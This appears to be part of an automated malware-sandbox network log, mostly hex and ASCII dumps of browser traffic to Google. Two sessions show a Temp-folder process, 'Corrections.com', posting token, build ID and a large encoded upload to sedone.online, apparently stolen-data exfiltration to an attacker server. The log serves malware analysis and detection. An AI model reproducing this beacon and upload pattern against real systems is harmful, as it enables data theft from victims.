                                                                                                                                                                                                                                                                                          Data Ascii: ss\u003d\"gb_D\" focusable\u003d\"false\" height\u003d\"24px\" viewBox\u003d\"0 -960 960 960\" width\u003d\"24px\"\u003e \u003cpath d\u003d\"M209-120q-42 0-70.5-28.5T110-217q0-14 3-25.5t9-21.5l228-341q10-14 15-31t5-34v-110h-20q-13 0-21.5-8.5T320-810q0-13
                                                                                                                                                                                                                                                                                          2024-12-15 19:47:47 UTC1303INData Raw: 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c 2d 32 73 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 20 30 2e 39 2c 32 20 32 2c 32 7a 4d 31 36 2c 36 63 30 2c 31 2e 31 20 30 2e 39 2c 32 20 32 2c 32 73 32 2c 2d 30 2e 39 20 32 2c 2d 32 20 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 7a 4d 31 32 2c 38 63 31 2e 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c 2d 32 73 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 20 30 2e 39 2c 32 20 32 2c 32 7a 4d 31 38 2c 31 34 63 31 2e 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c 2d 32 73 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 20 30 2e 39 2c 32 20 32 2c 32 7a 4d 31 38 2c 32 30 63 31 2e 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c
                                                                                                                                                                                                                                                                                          Data Ascii: 1,0 2,-0.9 2,-2s-0.9,-2 -2,-2 -2,0.9 -2,2 0.9,2 2,2zM16,6c0,1.1 0.9,2 2,2s2,-0.9 2,-2 -0.9,-2 -2,-2 -2,0.9 -2,2zM12,8c1.1,0 2,-0.9 2,-2s-0.9,-2 -2,-2 -2,0.9 -2,2 0.9,2 2,2zM18,14c1.1,0 2,-0.9 2,-2s-0.9,-2 -2,-2 -2,0.9 -2,2 0.9,2 2,2zM18,20c1.1,0 2,-0.9 2,
                                                                                                                                                                                                                                                                                          2024-12-15 19:47:47 UTC329INData Raw: 31 34 32 0d 0a 2c 22 6c 65 66 74 5f 70 72 6f 64 75 63 74 5f 63 6f 6e 74 72 6f 6c 2d 6c 61 62 65 6c 31 22 2c 22 6c 65 66 74 5f 70 72 6f 64 75 63 74 5f 63 6f 6e 74 72 6f 6c 2d 6c 61 62 65 6c 32 22 5d 2c 22 6d 65 6e 75 5f 70 6c 61 63 65 68 6f 6c 64 65 72 5f 6c 61 62 65 6c 22 3a 22 6d 65 6e 75 2d 63 6f 6e 74 65 6e 74 22 2c 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 62 61 72 5f 68 65 69 67 68 74 22 3a 36 30 2c 22 65 78 70 65 72 69 6d 65 6e 74 5f 69 64 22 3a 5b 33 37 30 30 32 39 31 2c 33 37 30 30 39 34 39 2c 33 37 30 31 33 38 34 5d 2c 22 69 73 5f 62 61 63 6b 75 70 5f 62 61 72 22 3a 66 61 6c 73 65 7d 2c 22 70 61 67 65 5f 68 6f 6f 6b 73 22 3a 7b 22 61 66 74 65 72 5f 62 61 72 5f 73 63 72 69 70 74 22 3a 7b 22 70 72 69 76 61 74 65 5f 64 6f 5f 6e 6f 74 5f 61 63 63 65 73
                                                                                                                                                                                                                                                                                          Data Ascii: 142,"left_product_control-label1","left_product_control-label2"],"menu_placeholder_label":"menu-content","metadata":{"bar_height":60,"experiment_id":[3700291,3700949,3701384],"is_backup_bar":false},"page_hooks":{"after_bar_script":{"private_do_not_acces
                                                                                                                                                                                                                                                                                          2024-12-15 19:47:47 UTC1390INData Raw: 38 30 30 30 0d 0a 6e 63 74 69 6f 6e 28 5f 29 7b 76 61 72 20 77 69 6e 64 6f 77 5c 75 30 30 33 64 74 68 69 73 3b 5c 6e 74 72 79 7b 5c 6e 5f 2e 43 64 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 29 7b 69 66 28 21 61 2e 6a 29 69 66 28 63 20 69 6e 73 74 61 6e 63 65 6f 66 20 41 72 72 61 79 29 66 6f 72 28 76 61 72 20 64 20 6f 66 20 63 29 5f 2e 43 64 28 61 2c 62 2c 64 29 3b 65 6c 73 65 7b 64 5c 75 30 30 33 64 28 30 2c 5f 2e 7a 29 28 61 2e 43 2c 61 2c 62 29 3b 63 6f 6e 73 74 20 65 5c 75 30 30 33 64 61 2e 76 2b 63 3b 61 2e 76 2b 2b 3b 62 2e 64 61 74 61 73 65 74 2e 65 71 69 64 5c 75 30 30 33 64 65 3b 61 2e 42 5b 65 5d 5c 75 30 30 33 64 64 3b 62 5c 75 30 30 32 36 5c 75 30 30 32 36 62 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 3f 62 2e 61 64 64
                                                                                                                                                                                                                                                                                          Data Ascii: 8000nction(_){var window\u003dthis;\ntry{\n_.Cd\u003dfunction(a,b,c){if(!a.j)if(c instanceof Array)for(var d of c)_.Cd(a,b,d);else{d\u003d(0,_.z)(a.C,a,b);const e\u003da.v+c;a.v++;b.dataset.eqid\u003de;a.B[e]\u003dd;b\u0026\u0026b.addEventListener?b.add
                                                                                                                                                                                                                                                                                          2024-12-15 19:47:47 UTC1390INData Raw: 64 63 6c 61 73 73 7b 63 6f 6e 73 74 72 75 63 74 6f 72 28 61 29 7b 74 68 69 73 2e 69 5c 75 30 30 33 64 61 7d 74 6f 53 74 72 69 6e 67 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 69 7d 7d 3b 5f 2e 4f 64 5c 75 30 30 33 64 6e 65 77 20 5f 2e 4e 64 28 5c 22 61 62 6f 75 74 3a 69 6e 76 61 6c 69 64 23 7a 43 6c 6f 73 75 72 65 7a 5c 22 29 3b 5f 2e 4b 64 5c 75 30 30 33 64 63 6c 61 73 73 7b 63 6f 6e 73 74 72 75 63 74 6f 72 28 61 29 7b 74 68 69 73 2e 6e 68 5c 75 30 30 33 64 61 7d 7d 3b 5f 2e 50 64 5c 75 30 30 33 64 5b 4c 64 28 5c 22 64 61 74 61 5c 22 29 2c 4c 64 28 5c 22 68 74 74 70 5c 22 29 2c 4c 64 28 5c 22 68 74 74 70 73 5c 22 29 2c 4c 64 28 5c 22 6d 61 69 6c 74 6f 5c 22 29 2c 4c 64 28 5c 22 66 74 70 5c 22 29 2c 6e 65 77 20 5f 2e 4b 64 28 61 5c 75 30 30 33 64 5c 75
                                                                                                                                                                                                                                                                                          Data Ascii: dclass{constructor(a){this.i\u003da}toString(){return this.i}};_.Od\u003dnew _.Nd(\"about:invalid#zClosurez\");_.Kd\u003dclass{constructor(a){this.nh\u003da}};_.Pd\u003d[Ld(\"data\"),Ld(\"http\"),Ld(\"https\"),Ld(\"mailto\"),Ld(\"ftp\"),new _.Kd(a\u003d\u
                                                                                                                                                                                                                                                                                          2024-12-15 19:47:47 UTC1390INData Raw: 6e 74 29 7b 6c 65 74 20 63 2c 64 3b 62 5c 75 30 30 33 64 28 64 5c 75 30 30 33 64 28 63 5c 75 30 30 33 64 5c 22 64 6f 63 75 6d 65 6e 74 5c 22 69 6e 20 62 3f 62 2e 64 6f 63 75 6d 65 6e 74 3a 62 29 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 29 5c 75 30 30 33 64 5c 75 30 30 33 64 6e 75 6c 6c 3f 76 6f 69 64 20 30 3a 64 2e 63 61 6c 6c 28 63 2c 60 24 7b 61 7d 5b 6e 6f 6e 63 65 5d 60 29 3b 72 65 74 75 72 6e 20 62 5c 75 30 30 33 64 5c 75 30 30 33 64 6e 75 6c 6c 3f 5c 22 5c 22 3a 62 2e 6e 6f 6e 63 65 7c 7c 62 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 5c 22 6e 6f 6e 63 65 5c 22 29 7c 7c 5c 22 5c 22 7d 3b 5c 6e 5f 2e 65 65 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 62 5c 75 30 30 33 64 5f 2e 50 61 28 61 29 3b 72 65 74 75 72 6e 20 62 5c 75 30 30
                                                                                                                                                                                                                                                                                          Data Ascii: nt){let c,d;b\u003d(d\u003d(c\u003d\"document\"in b?b.document:b).querySelector)\u003d\u003dnull?void 0:d.call(c,`${a}[nonce]`);return b\u003d\u003dnull?\"\":b.nonce||b.getAttribute(\"nonce\")||\"\"};\n_.ee\u003dfunction(a){var b\u003d_.Pa(a);return b\u00
                                                                                                                                                                                                                                                                                          2024-12-15 19:47:47 UTC1390INData Raw: 65 78 74 5c 75 30 30 33 64 63 3a 64 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 22 63 6c 61 73 73 5c 22 3f 61 2e 63 6c 61 73 73 4e 61 6d 65 5c 75 30 30 33 64 63 3a 64 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 22 66 6f 72 5c 22 3f 61 2e 68 74 6d 6c 46 6f 72 5c 75 30 30 33 64 63 3a 6f 65 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 28 64 29 3f 61 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 6f 65 5b 64 5d 2c 63 29 3a 5f 2e 6a 65 28 64 2c 5c 22 61 72 69 61 2d 5c 22 29 7c 7c 5f 2e 6a 65 28 64 2c 5c 22 64 61 74 61 2d 5c 22 29 3f 61 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 64 2c 63 29 3a 61 5b 64 5d 5c 75 30 30 33 64 63 7d 29 7d 3b 6f 65 5c 75 30 30 33 64 7b 63 65 6c 6c 70 61 64 64 69 6e 67 3a 5c 22 63 65 6c 6c 50 61 64 64 69 6e 67 5c 22 2c 63 65 6c 6c 73 70 61 63 69 6e
                                                                                                                                                                                                                                                                                          Data Ascii: ext\u003dc:d\u003d\u003d\"class\"?a.className\u003dc:d\u003d\u003d\"for\"?a.htmlFor\u003dc:oe.hasOwnProperty(d)?a.setAttribute(oe[d],c):_.je(d,\"aria-\")||_.je(d,\"data-\")?a.setAttribute(d,c):a[d]\u003dc})};oe\u003d{cellpadding:\"cellPadding\",cellspacin


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          10192.168.2.449754142.250.181.1324431228C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          2024-12-15 19:47:46 UTC353OUTGET /async/newtab_promos HTTP/1.1
                                                                                                                                                                                                                                                                                          Host: www.google.com
                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                          2024-12-15 19:47:47 UTC933INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                          Version: 704583840
                                                                                                                                                                                                                                                                                          Content-Type: application/json; charset=UTF-8
                                                                                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                          Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                                                                                                                                                                                                                                          Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]}
                                                                                                                                                                                                                                                                                          Accept-CH: Sec-CH-UA-Form-Factors
                                                                                                                                                                                                                                                                                          Accept-CH: Sec-CH-UA-Platform
                                                                                                                                                                                                                                                                                          Accept-CH: Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                                                                                          Accept-CH: Sec-CH-UA-Full-Version
                                                                                                                                                                                                                                                                                          Accept-CH: Sec-CH-UA-Arch
                                                                                                                                                                                                                                                                                          Accept-CH: Sec-CH-UA-Model
                                                                                                                                                                                                                                                                                          Accept-CH: Sec-CH-UA-Bitness
                                                                                                                                                                                                                                                                                          Accept-CH: Sec-CH-UA-Full-Version-List
                                                                                                                                                                                                                                                                                          Accept-CH: Sec-CH-UA-WoW64
                                                                                                                                                                                                                                                                                          Permissions-Policy: unload=()
                                                                                                                                                                                                                                                                                          Content-Disposition: attachment; filename="f.txt"
                                                                                                                                                                                                                                                                                          Date: Sun, 15 Dec 2024 19:47:46 GMT
                                                                                                                                                                                                                                                                                          Server: gws
                                                                                                                                                                                                                                                                                          X-XSS-Protection: 0
                                                                                                                                                                                                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                          Accept-Ranges: none
                                                                                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                          2024-12-15 19:47:47 UTC35INData Raw: 31 64 0d 0a 29 5d 7d 27 0a 7b 22 75 70 64 61 74 65 22 3a 7b 22 70 72 6f 6d 6f 73 22 3a 7b 7d 7d 7d 0d 0a
                                                                                                                                                                                                                                                                                          Data Ascii: 1d)]}'{"update":{"promos":{}}}
                                                                                                                                                                                                                                                                                          2024-12-15 19:47:47 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          11192.168.2.449761116.203.12.2414435496C:\Users\user\AppData\Local\Temp\628056\Corrections.com
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          2024-12-15 19:47:50 UTC325OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----F379R900ZU3E3EC2N7Y5
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                          Host: sedone.online
                                                                                                                                                                                                                                                                                          Content-Length: 505
                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                          2024-12-15 19:47:50 UTC505OUTData Raw: 2d 2d 2d 2d 2d 2d 46 33 37 39 52 39 30 30 5a 55 33 45 33 45 43 32 4e 37 59 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 36 65 33 30 36 38 66 63 61 35 39 35 39 61 33 39 63 36 61 39 32 37 65 37 37 66 61 31 61 65 32 0d 0a 2d 2d 2d 2d 2d 2d 46 33 37 39 52 39 30 30 5a 55 33 45 33 45 43 32 4e 37 59 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 39 36 30 30 30 39 64 64 38 37 35 37 66 63 34 63 37 61 36 35 64 63 65 65 66 32 39 35 66 36 65 30 0d 0a 2d 2d 2d 2d 2d 2d 46 33 37 39 52 39 30 30 5a 55 33 45 33 45 43 32 4e 37 59 35 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                          Data Ascii: ------F379R900ZU3E3EC2N7Y5Content-Disposition: form-data; name="token"f6e3068fca5959a39c6a927e77fa1ae2------F379R900ZU3E3EC2N7Y5Content-Disposition: form-data; name="build_id"960009dd8757fc4c7a65dceef295f6e0------F379R900ZU3E3EC2N7Y5Cont
                                                                                                                                                                                                                                                                                          2024-12-15 19:47:51 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                                          Date: Sun, 15 Dec 2024 19:47:50 GMT
                                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                          2024-12-15 19:47:51 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                          Data Ascii: 2ok0


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          12192.168.2.449766116.203.12.2414435496C:\Users\user\AppData\Local\Temp\628056\Corrections.com
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          2024-12-15 19:47:51 UTC328OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----O8GVASR9H4EUAIMOP8GV
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                          Host: sedone.online
                                                                                                                                                                                                                                                                                          Content-Length: 213453
                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                          2024-12-15 19:47:51 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 4f 38 47 56 41 53 52 39 48 34 45 55 41 49 4d 4f 50 38 47 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 36 65 33 30 36 38 66 63 61 35 39 35 39 61 33 39 63 36 61 39 32 37 65 37 37 66 61 31 61 65 32 0d 0a 2d 2d 2d 2d 2d 2d 4f 38 47 56 41 53 52 39 48 34 45 55 41 49 4d 4f 50 38 47 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 39 36 30 30 30 39 64 64 38 37 35 37 66 63 34 63 37 61 36 35 64 63 65 65 66 32 39 35 66 36 65 30 0d 0a 2d 2d 2d 2d 2d 2d 4f 38 47 56 41 53 52 39 48 34 45 55 41 49 4d 4f 50 38 47 56 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                          Data Ascii: ------O8GVASR9H4EUAIMOP8GVContent-Disposition: form-data; name="token"f6e3068fca5959a39c6a927e77fa1ae2------O8GVASR9H4EUAIMOP8GVContent-Disposition: form-data; name="build_id"960009dd8757fc4c7a65dceef295f6e0------O8GVASR9H4EUAIMOP8GVCont
                                                                                                                                                                                                                                                                                          2024-12-15 19:47:51 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                          2024-12-15 19:47:51 UTC16355OUTData Raw: 41 59 69 43 78 45 41 41 51 59 42 44 51 51 49 41 77 67 49 44 51 67 49 43 41 67 4a 43 41 41 76 5a 58 64 45 74 42 69 33 43 71 41 41 41 41 59 34 6f 47 49 66 43 68 45 41 41 51 59 42 44 51 51 49 43 41 67 49 44 51 67 49 43 41 67 4a 42 77 41 76 5a 58 64 45 74 42 69 33 43 59 41 41 41 41 59 66 43 52 45 41 41 51 59 42 44 51 51 49 43 41 67 49 44 51 67 49 43 41 67 4a 42 67 41 76 5a 58 64 45 74 42 69 33 43 49 41 41 41 41 59 65 43 42 45 41 41 51 59 49 44 51 51 49 43 41 67 49 44 51 67 49 43 41 67 4a 42 51 41 76 5a 58 64 45 74 42 69 33 45 41 41 41 42 69 49 48 45 51 41 42 42 67 45 4e 42 41 67 44 43 41 67 4e 43 41 67 49 43 41 6b 45 41 43 39 6c 5a 51 58 79 48 55 51 47 6f 41 41 41 42 67 50 73 35 42 38 47 45 51 41 42 42 67 45 4e 42 41 67 49 43 41 67 4e 43 41 67 49 43 41 6b 44
                                                                                                                                                                                                                                                                                          Data Ascii: AYiCxEAAQYBDQQIAwgIDQgICAgJCAAvZXdEtBi3CqAAAAY4oGIfChEAAQYBDQQICAgIDQgICAgJBwAvZXdEtBi3CYAAAAYfCREAAQYBDQQICAgIDQgICAgJBgAvZXdEtBi3CIAAAAYeCBEAAQYIDQQICAgIDQgICAgJBQAvZXdEtBi3EAAABiIHEQABBgENBAgDCAgNCAgICAkEAC9lZQXyHUQGoAAABgPs5B8GEQABBgENBAgICAgNCAgICAkD
                                                                                                                                                                                                                                                                                          2024-12-15 19:47:51 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                          2024-12-15 19:47:51 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                          2024-12-15 19:47:51 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                          2024-12-15 19:47:51 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
